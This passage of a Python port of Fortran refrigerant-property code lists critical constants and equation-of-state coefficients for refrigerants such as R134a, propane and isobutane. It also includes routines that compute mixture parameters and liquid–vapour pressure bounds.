PENTAFLUOROETHANE (C2HF5)\n\t\t#\n\t\tBData.HREF.append (\"R125\")\n\t\tBData.REFH.append (\" R125\")\n\t\tBData.CRIT.append ( [120.03, 224.6, 339.4, 3629.0, 0.2099 ] )\n\n\t\tBData.COEFF.append ( [ 3427.92, -3.17461E-3, -1.75729E-6,\t\t\\\n\t\t\t 0.149380, 
-1.80851E-4, -1.18813E-7,\t\t\\\n\t\t\t 22.65024, 0.295668, -1.69490E-4 ] )\n\t\t# Ref 14\n\t\t# R143A, 1,1,1-TRIFLUOROETHANE (CF3-CH3)\n\t\t#\n\t\tBData.HREF.append (\"R143A\")\n\t\tBData.REFH.append (\" R143A\")\n\t\tBData.CRIT.append ( [ 84.04, 225.8, 346.3, 3811., 0.194] )\n\n\t\tBData.COEFF.append ( [ 2763.90920, -2.509056E-3, -1.797108E-6,\t\t\\\n\t\t\t 0.133153E0, -1.589538E-4, -0.583311E-7,\t\t\\\n\t\t\t 13.89426E0, .2554913, -1.300829E-4] )\n\t\t# Ref 15\n\t\t# R134A: 1,1,1,2-TETRAFLUOROETHANE (CF3-CH2F)\n\t\t#\n\t\tBData.HREF.append (\"R134a\")\n\t\tBData.REFH.append (\" R134a\")\n\t\tBData.CRIT.append ( [ 102.030, 247.0, 374.3, 4067.0, 0.199 ] )\n\n\t\tBData.COEFF.append ( [ 3582.17, -2.81114E-3, -1.44679E-6,\t\t\\\n\t\t\t 0.141750, -1.62763E-4, -.628933E-7,\t\t\\\n\t\t\t 19.4006, 0.258531, -1.29665E-4 ] )\n\t\t# Ref 16\n\t\t# R123, 1,1-DICHLORO-2,2,2-TRIFLUOROETHANE (CHCL2-CF3)\n\t\t#\n\t\tBData.HREF.append (\"R123\")\n\t\tBData.REFH.append (\" R123\")\n\t\tBData.CRIT.append ( [ 152.93, 301.02, 456.9, 3674.0, 0.278 ] )\n\n\t\tBData.COEFF.append ( [ 6033.29, -2.37891E-3, -0.84728E-6,\t\t\\\n\t\t\t 0.199549, -1.89493E-4, -0.67680E-7,\t\t\\\n\t\t\t 29.2604, 0.302994, -1.92907E-4 ] )\n\t\t \n\t\t# Ref 17\n\t\t# RC318, PERFLUOROCYCLOBUTANE (C4F8)\n\t\t#\n\t\tBData.HREF.append (\"RC-318\")\n\t\tBData.REFH.append (\"RC-318\")\n\t\tBData.CRIT.append ( [ 200.04, 266.1, 388.4, 2778., 0.3248 ] )\n\n\t\tBData.COEFF.append ( [ 6182.614E0, -2.536687E-3, -2.265766E-6,\t\t\\\n\t\t\t .2255416E0, -1.898425E-4, -2.635465E-7,\t\t\\\n\t\t\t 28.972075E0, .5333363, -3.557726E-4] )\n\t\t# Ref 18\n\t\t# R134, 1,1,2,2-TETRAFLOUROETHANE (CHF2-CHF2)\n\t\t#\n\t\tBData.HREF.append (\"R134\")\n\t\tBData.REFH.append (\" R134\")\n\t\tBData.CRIT.append ( [ 102.03, 253.34, 392.1, 4562.0, 0.189 ] )\n\n\t\tBData.COEFF.append ( [ 3547.10, -2.68720E-3, -1.41578E-6,\t\t\\\n\t\t\t 0.13856, -1.5991E-4, -0.55880E-7,\t\t\\\n\t\t\t 32.5208, 0.222819, -1.06829E-4 ] )\n\t\t# Ref 19\n\t\t# RC270, CYCLOPROPANE (C3H6)\n\t\t#\n\t\tBData.HREF.append (\"RC270\")\n\t\tBData.REFH.append (\" RC270\")\n\t\tBData.CRIT.append ( [42.081, 240.25, 398.30, 5580.0, 0.194 ] )\n\n\t\tBData.COEFF.append ( [ 2745.00, -2.98122E-3, 1.64391E-7,\t\t\\\n\t\t\t 0.125065, -2.01031E-4, 7.8506E-8,\t\t\\\n\t\t\t 8.19470, 0.136885, 0.777583E-4 ] )\n\t\t# Ref 20\n\t\t# R141b, 1,1-DICHLORO-1-FLUOROETHANE (CFCL2-CH3)\n\t\t#\n\t\tBData.HREF.append (\"R141B\")\n\t\tBData.REFH.append (\" R141b\")\n\t\tBData.CRIT.append ( [116.94, 305.35, 477.3, 4120., 0.217 ] )\n\n\t\tBData.COEFF.append ( [ 5422.38, -2.24167E-3, -6.04435E-7,\t\t\\\n\t\t\t 0.180853, -1.61856E-4, -6.23542E-8,\t\t\\\n\t\t\t 35.8434, 0.175268, 0.0 ] )\n\t\t# Ref 21\n\t\t# i-C5 ISO-PENTANE (C4H9-CH3)\n\t\t#\n\t\tBData.HREF.append (\"i-C5\")\n\t\tBData.REFH.append (\" i-C5\")\n\t\tBData.CRIT.append ( [ 72.150, 300.9, 460.51, 3370.7, 0.306 ] )\n\n\t\tBData.COEFF.append ( [ 6408.1, -2.3216E-3, -0.7087E-6,\t\t\\\n\t\t\t 0.227727, -2.4414E-4, -2.9694E-8,\t\t\\\n\t\t\t 12.216, 0.37563, -5.9925E-5 ] )\n\t\t# Ref 22\n\t\t# R290, PROPANE (C3H8)\n\t\t#\n\t\tBData.HREF.append (\"R290\")\n\t\tBData.REFH.append (\" R290\")\n\t\tBData.CRIT.append ( [ 44.10, 231.1, 369.85, 4247.7, 0.220 ] )\n\n\t\tBData.COEFF.append ( [ 2988.28, -2.62902E-3, -1.09706E-6,\t\t\\\n\t\t\t 0.142963, -1.76519E-4, -5.78514E-8,\t\t\\\n\t\t\t 26.88900, 0.1250300, 1.07890E-4 ] )\n\t\t# Ref 23\n\t\t# R600, N-BUTANE (C4H10)\n\t\t#\n\t\tBData.HREF.append (\"R600\")\n\t\tBData.REFH.append (\" R600\")\n\t\tBData.CRIT.append ( [ 58.124, 272.6, 
425.16, 3796., 0.2548 ] )\n\n\t\tBData.COEFF.append ( [4822.7, -2.6499E-3, -0.4397E-6,\t\t\\\n\t\t\t 0.1908, -2.4836E-4, 0.2846E-7,\t\t\\\n\t\t\t 9.442, 0.3317, -1.1297E-4 ] )\n\t\t# Ref 24\n\t\t# R600a, ISOBUTANE [C(CH3)3]\n\t\t#\n\t\tBData.HREF.append (\"R600a\")\n\t\tBData.REFH.append (\" R600a\")\n\t\tBData.CRIT.append ( [58.124, 261.39, 407.9, 3630.6, 0.256 ] )\n\n\t\tBData.COEFF.append ([ 4197.24, -2.1894E-3, -1.3004E-6,\t\\\n\t\t\t 0.1803, -1.8719E-4, -8.1778E-8,\t\t\\\n\t\t\t 27.6833, 0.199384, 1.06305E-4 ] )\n\t\t# Ref 25\n\t\t# R32: DIFLUOROMETHANE (CH2F2)\n\t\t#\n\t\tBData.HREF.append (\"R32\")\n\t\tBData.REFH.append (\" R32\")\n\t\tBData.CRIT.append ( [52.024, 221.40, 351.36, 5791.0, .120 ] )\n\n\t\tBData.COEFF.append ([ 1662.27, -2.19753E-3, -1.88903E-6,\t\\\n\t\t\t 0.0779879, -0.75238E-4, -0.53011E-7,\t\\\n\t\t\t 29.2127, 0.0192902, 8.91429E-5 ] )\n\t\t# Ref 26\n\t\t# R1270, PROPYLENE (C3H6)\n\t\t#\n\t\tBData.HREF.append (\"R1270\")\n\t\tBData.REFH.append (\" R1270\")\n\t\tBData.CRIT.append ( [42.09, 255.46, 364.9, 4621.7, 0.1937 ] )\n\t\tBData.HZERO [26] = -8695.95 ; BData.SZERO [26] = 170.53 # DATA HZERO(26),SZERO(26) -8695.95, 170.53 ] )\n\t\t\t \n\t\tBData.COEFF.append ([ 2294.38, -1.57422E-03, -2.98847E-06,\\\n\t\t\t .1253157, -1.28616E-04, -1.09990E-07,\t\\\n\t\t\t 3.856, 0.2321, -1.0308E-4 ] )\n\t\t \n\t\t# Ref 27\n\t\t# R124, 1-CHLORO-1,2,2,2-TETRAFLOUROETHANE (C2HF5)\n\t\t#\n\t\tBData.HREF.append (\"R124\")\n\t\tBData.REFH.append (\" R124\")\n\t\tBData.CRIT.append ( [136.48, 259.96, 395.62, 3637., 0.244 ] )\n\n\t\tBData.COEFF.append ([ 4504.401, -2.574376E-3, -1.4705E-6,\t\\\n\t\t\t 0.173954, -1.79579E-4, -1.04407E-7,\t\t\\\n\t\t\t 30.9777, 0.254206, -9.36414E-5 ] )\n\t\t# Ref 28\n\t\t# R115, CHLOROPENTAFLOUROETHANE (CF2CL-CF3)\n\t\t#\n\t\tBData.HREF.append (\"R115\")\n\t\tBData.REFH.append (\" R115\")\n\t\tBData.CRIT.append ( [154.47, 233.98, 353.05, 3153.0, 0.252 ] )\n\n\t\tBData.COEFF.append ([ 3968.734, -2.471498E-3, -2.656280E-6,\t\\\n\t\t\t .1817131, -1.797986E-4, -2.305032E-7,\t\\\n\t\t\t 20.0246, .3765849E0, -2.703487E-4 ] )\n\t\t# Ref 29\n\t\t# CE-216, FROM JIM SANDS OF ORNL RECEIVED 12] )23] )91\n\t\t#\n\t\tBData.HREF.append (\"CE-216\")\n\t\tBData.REFH.append (\"CE-216\")\n\t\tBData.CRIT.append ( [166.02, 233.15, 361.8, 3094.0, 0.272 ] )\n\n\t\tBData.COEFF.append ([ 3808.5, -0.0017285, -3.81991E-6,\t\\\n\t\t\t 0.16412557, -6.60150E-5, -3.83529E-7,\t\\\n\t\t\t -52.9448624, 0.6902447, -0.0006871 ] )\n\t\t# Ref 30\n\t\t# E-125, FROM CYNTHIA GAGE 2-11-93\n\t\t#\n\t\tBData.HREF.append (\"E-125\")\n\t\tBData.REFH.append (\" E-125\")\n\t\tBData.CRIT.append ( [136.02, 238.55, 353.8, 3330.0, 0.2385 ] )\n\n\t\tBData.COEFF.append ([ 3112.3, -0.0013240, -4.48727E-6,\t\\\n\t\t\t 0.15782070, -0.0001235, -2.51097E-7,\t\\\n\t\t\t 31.5556400, 0.3137960, -0.0001836 ] )\n\t\t# Ref 31\n\t\t# R123a 1,2-DICHLORO-1,1,2-TRIFLUOROETHANE\n\t\t#\n\t\tBData.HREF.append (\"R213A\")\n\t\tBData.REFH.append (\" R123A\")\n\t\tBData.CRIT.append ([ 152.93, 303.2, 461.1, 3741.0, 0.2812 ] )\n\n\t\tBData.COEFF.append ([6376.995, -2.691077E-3, -2.524465E-7,\t\\\n\t\t\t .2016864, -2.035804E-4, -3.644260E-8,\t\\\n\t\t\t 48.23970, .1856480, 0.0 ] )\n\t\t# Ref 32\n\t\t# R143, 1,1,2-TRIFLUOROETHANE (CF2H-CFH2)\n\t\t#\n\t\tBData.HREF.append (\"R143\")\n\t\tBData.REFH.append (\" R143\")\n\t\tBData.CRIT.append ( [84.04, 277.2, 429.9, 4520.0, 0.190 ] )\n\n\t\tBData.COEFF.append ([3680.023, -2.4128619E-3, -1.183791E-6,\t\\\n\t\t\t .1221286, -8.9741778E-5, -1.068718E-7,\t\\\n\t\t\t 24.9639, .187598, 
-4.031996E-5 ] )\n\t\t# Ref 33\n\t\t# R218, PERFLUOROPROPANE (C3F8)\n\t\t#\n\t\tBData.HREF.append (\"R218\")\n\t\tBData.REFH.append (\" R218\")\n\t\tBData.CRIT.append ([ 188.03, 236.4, 345.1, 2680.1, 0.2994 ] )\n\n\t\tBData.COEFF.append ([ 4486.64, -1.952581E-3, -4.49894E-6,\t\\\n\t\t\t .205911, -1.493288E-4, -4.30009E-7,\t\\\n\t\t\t 23.2683, .536728, -3.97647E-4 ] )\n\t\t# Ref 34\n\t\t# E134, BIS(DIFLUOROMETHYL) (CHF2-O-CHF2)\n\t\t#\n\t\tBData.HREF.append (\"E134\")\n\t\tBData.REFH.append (\" E134\")\n\t\tBData.CRIT.append ([ 118.03, 279.3, 420.3, 4228.0, 0.224 ] )\n\n\t\tBData.COEFF.append([ 6016.695, -4.051717E-3, 8.906450E-7,\t\t\\\n\t\t\t .1718950, -2.308880E-4, 2.837796E-8,\t\t\\\n\t\t\t -26.7633, .6152671, -6.58095E-4 ] )\t\n\n\nclass Block2 (BData):\n\t# = = = = = = = = = = = = = = = = = = = = = = = = \n\t# Set Static Vars\n\t# = = = = = = = = = = = = = = = = = = = = = = = = \n\tdef __init__(self):\n\t\tself.setup()\n\n\t#=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.==.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=\n\t# in Python only, to fix Fortant issue\n\tdef setArr2dCol(self, arry_2dim, int_col, arr_1dim ):\n\t\tfor ncnt in range (len(arry_2dim)):\n\t\t\tarry_2dim [ncnt][int_col] = arr_1dim [ncnt]\n\t\treturn\n\n\t#=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.==.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=\n\tdef getArr2dCol(self, arry_2dim, int_col):\n\t\tarr_1dim = []\n\t\tfor ncnt in range (len(arry_2dim)):\n\t\t\tarr_1dim.append ( arry_2dim [ncnt][int_col])\n\t\treturn arr_1dim\n\n\t#=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.==.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=\n\tdef getArr3dLevel(self, arry_3dim, int_level):\n\t\tx_direc = len(arry_3dim)\n\t\ty_direc = len(arry_3dim[0])\n\t\tarr_2dim = [[0.0] * (y_direc +1) for i in range(x_direc)]\n\t\tfor x in range (x_direc):\n\t\t\tfor y in range (y_direc):\n\t\t\t\tarr_2dim [x][y] =( arry_3dim [x][y][int_level])\n\t\treturn arr_2dim\n\t\t\n\t# = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . \n\tdef bconst (self, NCIN, IR, FIN):\n\t\t#\t SUBROUTINE BCONST (NCIN,IR,FIN)\n\t\t#\n\t\t# THIS ROUTINE ACCESSES THE CURVE FIT COEFFICIENTS TO THE EQUATION\n\t\t# OF STATE PARAMETERS (STORED IN BLOCK DATA BDESC) FOR THE\n\t\t# REFRIGERANT PAIR OF INTEREST. THE REFERENCE STATES FOR ENTHALPY\n\t\t# AND ENTROPY ARE ALSO COMPUTED. 
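# --- editor's sketch (numpy is an assumption; the original uses plain lists) ---
# setArr2dCol/getArr2dCol above re-create Fortran-style column access on
# lists of lists; with numpy the same operations are single slices:
import numpy as np

arr = np.zeros((6, 3))
arr[:, 2] = [10, 11, 12, 13, 14, 15]   # setArr2dCol(arr, 2, values)
col = arr[:, 2].tolist()               # getArr2dCol(arr, 2)
# --- end sketch ---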
THIS SUBROUTINE MUST BE CALLED\n\t\t# BEFORE ANY OTHER PROPERTY ROUTINES ARE REFERENCED AND ALSO IF\n\t\t# THE MIXTURE OR THE VALUES OF THE INTERACTION COEFFICIENTS, F(I,J),\n\t\t# ARE CHANGED.\n\t\t#\n\t\t# INPUTS:\n\t\t# IR - ARRAY OF CODE NUMBERS FOR THE COMPONENTS OF THE MIXTURE\n\t\t# FIN - MIXTURE INTERACTION PARAMETER FOR BINARY PAIRS OF\n\t\t# PURE COMPONENTS\n\t\t#\n\t\t# OUTPUTS (VIA COMMON BLOCKS):\n\t\t# A - ARRAY OF A COEFFICIENTS FOR THE PURE COMPONENTS\n\t\t# B - ARRAY OF B COEFFICIENTS FOR THE PURE COMPONENTS\n\t\t# C - ARRAY OF PURE COMPONENT CP0 COEFFICIENTS\n\t\t# HR - ARRAY OF PURE COMPONENT REFERENCE\n\t\t# ENTHALPIES; THESE ARE EQUAL TO THE SATURATED LIQUID\n\t\t# ENTHALPY AT THE REFERENCE TEMPERATURE MINUS THE PERFECT\n\t\t# GAS ENTHALPY AT THE REFERENCE TEMPERATURE\n\t\t# SR - REFERENCE ENTROPIES; EQUAL TO THE DIFFERENCE BETWEEN\n\t\t# THE SATURATED LIQUID AND PERFECT GAS ENTROPIES AT THE\n\t\t# REFERENCE TEMPERATURE\n\t\t# TC - PURE COMPONENT CRITICAL TEMPERATURES\n\t\t# TREF - REFERENCE TEMPERATURES AT WHICH HR AND SR ARE COMPUTED\n\t\t# WM - PURE COMPONENT MOLECULAR WEIGHTS\n\t\t#\n\t\t# OTHER SUBROUTINES REFERENCED:\n\t\t# BUBLT - COMPUTE SATURATED LIQUID AND VAPOR CONDITIONS\n\t\t# HCVCPS - COMPUTE ENTHALPY AT REFERENCE STATE\n\t\t# ENTROP - COMPUTE REFERENCE ENTROPY\n\t\t#\n\t\t#\t IMPLICIT REAL (A-H,O-Z)\n\t\t#\t DIMENSION IR(5),X(5),XV(5),FIN(5,5)\n\t\t#\t CHARACTER*6 HREF(34),REFH(34)\n\t\t#\t COMMON /NCOMP/ NC\n\t\t#\t COMMON /ESDATA/ COEFF(9,34),CRIT(5,34)\n\t\t#\t COMMON /ESPAR1/ AP(5),BP(5),F(5,5),DADT,DBDT,D2ADT,D2BDT\n\t\t#\t COMMON /HREF1/ HREF,REFH\n\t\t#\t COMMON /RDATA1/ A(0:2,5),B(0:2,5)\n\t\t#\t COMMON /RDATA2/ WM(5),TC(5)\n\t\t#\t COMMON /CPDATA/ C(0:2,5)\n\t\t#\t COMMON /HSZERO/ HZERO(34),SZERO(34)\n\t\t#\t COMMON /REF/ TREF(5),HR(5),SR(5),VR(5)\n\t\t\n\t\t#self.setup() # only in Python\n\t\t\n\t\tXV = [0.0] *(5+1)\n\t\tBData.NC = NCIN\n\t\t\n\t\tfor KR in range(1,BData.NC + 1):\t\t\t# DO 100 KR = 1,NC\n\n\t\t\tBData.WM [KR] = BData.CRIT [ IR[KR] -1] [1-1]\t#WM(KR) = CRIT(1,IR(KR))\n\t\t\tBData.TREF[KR] = BData.CRIT [ IR[KR] -1] [2-1]\n\t\t\n\t\t\tBData.TC [KR] = BData.CRIT [ IR[KR] -1] [3-1]\n\t\t\tBData.HR [KR] = 0.0\t# not required in Python\n\t\t\tBData.SR [KR] = 0.0\t# not required in Python\n\t\t\tBData.VR [KR] = 1.0\n\n\t\t\tfor J in range(KR+1 ,BData.NC + 1): \t#DO 98 J = KR + 1,NC\n\t\t\t\tBData.F[KR][J] = FIN [KR][J]\t#\tF(KR,J) = FIN(KR,J)\n\t\t\t\tBData.F[J] [KR] = FIN [KR][J]\t#98 F(J,KR) = FIN(KR,J)\n\n\t\t\tBData.F[KR][KR] = 0.0\t\t#F(KR,KR) = 0.0\n\n\t\t\tfor KC in range(0, 2+1):\t\t#DO 100 KC = 0,2\n\t\t\t\tBData.A[KC][KR-1] = BData.COEFF [ IR[KR] -1][KC + 1 -1]\t\t#A(KC,KR) = COEFF(KC + 1,IR(KR))\n\t\t\t\tBData.B[KC][KR-1] = BData.COEFF [ IR[KR] -1][KC + 4 -1]\t\t#B(KC,KR) = COEFF(KC + 4,IR(KR))\n\t\t\t\tBData.C[KC][KR-1] = BData.COEFF [ IR[KR] -1][KC + 7 -1]\t\t# C(KC,KR) = COEFF(KC + 7,IR(KR))\n\n\t\t# CALL BUBBLE POINT ROUTINE TO CALCULATE SATURATED LIQUID AND VAPOR\n\t\t# VOLUMES AND : CALL ENTHALPY AND ENTROPY ROUTINE TO DETERMINE\n\t\t# REFERENCE VALUES. THE HZERO AND SZERO ALLOW AN ARBITRARY VALUE\n\t\t# TO BE ASSIGNED TO THE SATURATED LIQUID H OR S AT THE REFERENCE\n\t\t# TEMPERATURE.\n\n\t\tfor KR in range(1,BData.NC + 1) :\t\t#\tDO 164 KR = 1,NC\n\t\t\tX = [0.0] * (BData.NC+1)\t\t\t# DO 160 I = 1,NC\t#160 X[I] = 0.0\n\t\t\tX[KR] = 1.0\n\t\t\n\t\t\t# [P2, P3 ,P4, P5, P6, P8] = bublt (P1, P2, P3 , P7 )\n\t\t\t# CALL BUBLT (TREF(KR),X,XV, P,VR(KR),VV,. 
TRUE.,.FALSE.)\n\t\t\t[X, XV, P, BData.VR[KR], VV, _] = self.bublt (BData.TREF[KR], X, XV, True) \n\t\t\t\n\t\t\t#[P5, P6, P7, P8] = self.hcvcps (P1, P2, P3, P4)\n\t\t\t[HRKR, CV, CPX, VS] = self.hcvcps (1, BData.TREF[KR], BData.VR[KR], X) \t# CALL HCVCPS (1,TREF(KR),VR(KR),X, HRKR,CV,CPX,VS)\n\t\t\t\n\t\t\tBData.HR[KR] = HRKR - BData.HZERO [ IR[KR] ]\t#HR(KR) = HRKR - HZERO(IR(KR))\n\t\t\tBData.SR[KR] = self.entrop ( BData.TREF[KR], BData.VR[KR], X ) - BData.SZERO [ IR[KR]]\n\t\treturn\n\n\t# = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . \n\tdef plimit (self, T, A, B): \t# ,VL,VU,PLOW,PUP\n\t\t# SUBROUTINE PLIMIT (T,A,B,VL,VU,PLOW,PUP)\n\t\t#\n\t\t# GIVEN TEMPERATURE AND EQUATION OF STATE PARAMETERS, THIS\n\t\t# ROUTINE CALCULATES THE UPPER AND LOWER BOUNDS ON PRESSURE\n\t\t# FOR WHICH THERE ARE BOTH LIQUID AND VAPOR SOLUTIONS TO THE\n\t\t# EQUATION OF STATE. IT CARRIES OUT TWO BISECTION METHOD\n\t\t# ITERATIONS TO FIND THE POINTS WHERE THE DERIVATIVE OF PRESSURE\n\t\t# W.R.T. VOLUME IS ZERO.\n\t\t#\n\t\t# INPUTS:\n\t\t# T - TEMPERATURE (K)\n\t\t# A,B - EQUATION OF STATE PARAMETERS AT TEMPERATURE T\n\t\t#\n\t\t# OUTPUTS:\n\t\t# PLOW - LOWER BOUND ON PRESSURE (PLOW CAN BE NEGATIVE, THE\n\t\t# CALLING PROGRAM MUST CHECK AND CORRECT FOR NEGATIVE\n\t\t# PRESSURES)\n\t\t# PUP - UPPER BOUND ON PRESSURE (KPA)\n\t\t# VL - MOLAR VOLUME AT PLOW (M**3/KMOL)\n\t\t# VU - MOLAR VOLUME AT PUP (M**3/KMOL)\n\t\t#\n\t\t# OTHER SUBROUTINES REFERENCED:\n\t\t# NONE\n\t\t#\n\t\t#\n\t\t#\t IMPLICIT REAL (A-H,O-Z)\n\t\t#\t COMMON /RDATA4/ R\n\t\t#\t COMMON /TOL/ TOLR,ITMAX,LUP\n\t\t#\n\t\t# STATEMENT FUNCTIONS FOR THE EVALUATION OF PRESSURE AS A\n\t\t# FUNCTION OF V AND THE DERIVATIVE OF PRESSURE W.R.T\n\t\t# VOLUME AS A FUNCTION OF V\n\t\t#\n\t\tdef P(RT,V,Y,A,B):\n\t\t\treturn (RT * (1.0 + (1.0 + (1.0 - Y ) * Y ) * Y ) / pow(1.0 - Y,3) - A/(V+B))/V\n\n\t\tdef DP(RT,V,A,B,B4,B42) :\n\t\t\treslt = (-RT * (B42 * B42 + (-4.0 * B42 * B4 \\\n\t\t\t\t+ (4.0 * B42 + (4.0 * B4 + V) * V ) * V ) * V ) \\\n\t\t\t\t/ pow(V - B4,4)\\\n\t\t\t\t+ A * ( 2.0 * V + B ) / pow( V + B,2) \\\n\t\t\t\t) / ( V * V)\n\t\t\treturn reslt\n\n\t\tVPOS = 0.0 # Only in Python set starting value\n\t\tB4 = 0.25 * B\n\t\tB42 = B4 * B4\n\t\tRT = BData.R * T\n\t\t#\n\t\t# STARTING AT A VOLUME OF 12.0*B4 (WHICH HAS A POSITIVE SLOPE\n\t\t# FOR ALL 'REASONABLE' VALUES OF A, B, T) REDUCE THE VOLUME\n\t\t# UNTIL A NEGATIVE SLOPE OF P W.R.T. 
V IS FOUND AND THEN BEGIN\n\t\t# BISECTION METHOD TO FIND LOWER BOUND ON VOLUME AND PRESSURE.\n\t\t#\n\t\tVC = 12.0272727 * B4\n\t\tV = VC\n\t\t\n\t\tfor IT in range (1, BData.ITMAX +1):\t# DO 100 IT=1,ITMAX\n\t\t\tDPDV = DP(RT, V, A, B, B4, B42)\n\t\t\tif (DPDV <= 0.0):break\t# GOTO 116\n\n\t\t\tVPOS = V\n\t\t\tV = 0.5 * ( V + B4)\n\n\t\tVNEG = V\t\t# location 116\n\n\t\tfor IT in range (1, 20+1):\t#DO 120 IT=1,20\n\t\t\tVL = 0.5 *( VNEG + VPOS)\n\t\t\tDPDV = DP(RT, VL, A, B, B4, B42)\n\n\t\t\tif (DPDV < 0.0):\n\t\t\t\tVNEG = VL\n\t\t\telse:\n\t\t\t\tVPOS = VL\n\n\t\tY = B4/VL\n\t\t\n\t\tPLOW = P(RT, VL, Y, A, B)\n\t\t#\n\t\t# STARTING AT V = 2*A/RT INCREASE V UNTIL A NEGATIVE\n\t\t# SLOPE IS FOUND; USE WITH V = 12.0*B TO BEGIN BISECTION\n\t\t# ITERATION FOR UPPER BOUND ON PRESSURE\n\t\t#\n\t\tVPOS = VC\n\t\tV = 2.0 * A /RT\n\n\t\tfor IT in range (1, BData.ITMAX + 1):\t#DO 160 IT=1,ITMAX\n\t\t\tDPDV = DP(RT,V,A,B,B4,B42)\n\t\t\tif (DPDV <= 0.0): break\t# GOTO 164\n\t\t\tVPOS = V\n\t\t\tV = 2.0 * V\n\n\t\tVNEG = V\t\t# location 164\n\n\t\tfor IT in range (1,20 +1): # DO 180 IT=1,20\n\t\t\tVU = 0.5 * (VNEG+VPOS)\n\t\t\tDPDV = DP(RT,VU,A,B,B4,B42)\n\t\t\tif (DPDV < 0.0) :\n\t\t\t\tVNEG = VU\n\t\t\telse :\n\t\t\t\tVPOS = VU\n\n\t\tY=B4/VU\n\t\tPUP = P(RT,VU,Y,A,B)\n\t\treturn [VL,VU,PLOW,PUP] \n\n\t# = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . \n\tdef espar (self, IQ,T,X): # ,AMIX,BMIX\n\t\t# [P4, P5] = self.espar [P1, P2, P3]\n\t\t# [AMIX,BMIX] = self.espar (IQ,T,X)\n\t\t#\n\t\t#\t SUBROUTINE espar (IQ,T,X,AMIX,BMIX)\n\t\t#\n\t\t# THIS ROUTINE CALCULATES THE EQUATION OF STATE PARAMETERS AND THEIR\n\t\t# TEMPERATURE DEVIVATIVES AS A FUNCTION OF TEMPERATURE AND COMPOSITION\n\t\t# AS NEEDED BY THE OTHER PROPERTY ROUTINES. BASED ON THE VALUE OF THE\n\t\t# INPUT QUALifIER THE NECESSARY PARAMETERS ARE CALCULATED.\n\t\t# THE TEMPERATURE DEPENDENCE OF THE\n\t\t# A, B, AND CP0 PARAMETERS ARE CONTAINED ENTIRELY WITHIN espar;\n\t\t# ALTERNATE EXPRESSIONS REQUIRE CHANGING ONLY THIS SUBROUTINE.\n\t\t# (CHANGES IN THE COMPOSITION DEPENDENCE OF A AND B WOULD ALSO\n\t\t# REQUIRE CHANGING THE FUNCTION SUBROUTINE FOR CHEMICAL POTENTIAL.)\n\t\t#\n\t\t# INPUTS:\n\t\t# IQ - INPUT QUALIfIER\n\t\t# = 0 COMPUTE ONLY A AND B\n\t\t# > = 1 ALSO COMPUTE TEMPERATURE DERIVATIVES OF A AND B\n\t\t# > = 2 ALSO COMPUTE SECOND DERIVATIVE OF A AND B AND\n\t\t# IDEAL GAS HEAT CAPACITY\n\t\t# = 1, 2 OR 3 ALSO COMPUTE CONSTANTS FOR PURE COMPONENT ENTHALPY\n\t\t# AND ENTROPY\n\t\t# T - TEMPERATURE (K)\n\t\t# X - COMPOSITION (MOLE FRACTION COMPONENT A)\n\t\t#\n\t\t# OUTPUTS:\n\t\t# AMIX - 'A' PARAMETER FOR MIXTURE AT T, X\n\t\t# BMIX - 'B' PARAMETER FOR MIXTURE AT T, X\n\t\t#\n\t\t# OUTPUTS (VIA COMMON BLOCKS):\n\t\t# A(I) - 'A' PARAMETER FOR PURE COMPONENT I\n\t\t# B(I) - 'B' PARAMETER FOR PURE COMPONENT I\n\t\t# F(I,J) - MIXTURE INTERACTION PARAMETER FOR BINARY PAIR I,J\n\t\t# BData.DADT - TEMPERATURE DERIVATIVE OF A\n\t\t# DBDT - TEMPERATURE DERIVATIVE OF B\n\t\t# D2ADT2 - SECOND DERIVATIVE OF A WITH RESPECT TO TEMPERATURE\n\t\t# D2BDT2 - SECOND DERIVATIVE OF B WITH RESPECT TO TEMPERATURE\n\t\t# BData.HP(I) - INTEGRAL OF CP(I) WITH RESPECT TO TEMP FOR PURE I\n\t\t# SP(I) - INTEGRAL OF (CP(I) - R) / T WITH RESPECT TO TEMP FOR PURE I\n\t\t# CP(I) - PERFECT GAS HEAT CAPACITY FOR COMPONENT I (KJ / (KG MOL K))\n\t\t#\n\t\t#\n\n\t\t#DIMENSION X(5),AJI(5,5),DAJI(5,5),DA(5,5)\n\t\t#COMMON / NCOMP / BData.NC\n\t\t#COMMON / ESPAR1 / BData.AP(5),BP(5),BData.F(5,5),DADT,DBDT,BData.D2ADT,BData.D2BDT\n\t\t#COMMON / 
RDATA1 / BData.A(0:2,5),BData.B(0:2,5)\n\t\t#COMMON / CPDATA / BData.C(0:2,5)\n\t\t#COMMON / HSPURE / BData.HP(5),BData.SP(5),BData.CP(5)\n\t\t#COMMON / REF / TREF(5),HR(5),SR(5),VR(5)\n\t\t#COMMON / RDATA4 / R\n\n\t\t# Local Vars\n\t\tAJI = [[0.0] * (5+1) for i in range(5+1)]\t# array(Rows, Cols) = [[0] * Cols for i in range(Rows)]\n\t\tDA = [[0.0] * (5+1) for i in range(5+1)]\t# array(Rows, Cols) = [[0] * Cols for i in range(Rows)]\n\t\tDAJI = [[0.0] * (5+1) for i in range(5+1)]\t# array(Rows, Cols) = [[0] * Cols for i in range(Rows)]\n\t\tAMIX = 0.0\n\t\tBMIX = 0.0\n\n\t\tfor I in range(1, BData.NC + 1):\t#DO 120 I = 1,NC\n\t\t\tBData.AP[I] = BData.A[0][I-1] * math.exp((BData.A[1][I-1] + BData.A[2][I-1] * T) * T)\n\t\t\tBData.BP[I] = BData.B[0][I-1] + (BData.B[1][I-1] + BData.B[2][I-1] * T) * T\n\t\t\t\n\t\t\tAJI[I][I] = X[I] * X[I] * BData.AP[I]\n\t\t\tAMIX = AMIX + AJI[I][I]\n\t\t\tBMIX = BMIX + X[I] * BData.BP[I]\n\n\t\t\tfor J in range(1, (I - 1) + 1):\t#DO 120 J = 1,I - 1\n\t\t\t\tAJI[J][I] = X[J] * X[I] * (1.0 - 